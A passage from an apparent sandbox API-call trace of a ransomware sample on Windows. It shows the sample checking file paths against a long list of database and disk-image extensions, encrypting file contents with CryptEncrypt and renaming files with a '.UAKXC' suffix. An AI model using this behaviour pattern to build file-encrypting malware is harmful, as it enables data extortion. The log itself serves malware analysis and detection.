(lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0140.870] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".xld") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".abs") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".abx") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".adn") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".db2") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".icg") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".icr") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".lut") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".maw") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0140.871] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0140.872] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0140.872] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0140.872] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".raw") returned 0x0 [0140.872] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0140.872] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0140.872] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".bin") returned 0x0 [0140.872] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0140.872] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0140.872] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0140.872] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0140.872] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0140.872] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0140.872] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpSrch=".iso") returned 0x0 [0140.872] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.872] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.873] WriteFile (in: hFile=0x6c8, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.874] SetEndOfFile (hFile=0x6c8) returned 1 [0140.874] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.874] ReadFile (in: hFile=0x6c8, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x170, lpOverlapped=0x0) returned 1 [0140.874] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffe90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.874] WriteFile (in: hFile=0x6c8, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x170, lpOverlapped=0x0) returned 1 [0140.874] CloseHandle (hObject=0x6c8) returned 1 [0140.875] GetProcessHeap () returned 0xea0000 [0140.875] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0140.875] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" [0140.875] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.UAKXC" [0140.876] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn.uakxc")) returned 1 [0140.876] GetProcessHeap () returned 0xea0000 [0140.876] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0140.876] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd900 | out: hHeap=0xea0000) returned 1 [0140.876] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef24e8 | out: hHeap=0xea0000) returned 1 [0140.876] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0140.876] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0140.876] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0140.877] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn")) returned 0x2022 [0140.999] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0140.999] GetLastError () returned 0x0 [0140.999] GetFileSizeEx (in: hFile=0x6cc, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=326) returned 1 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.000] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.001] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.002] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.003] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.004] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.005] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.006] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn", 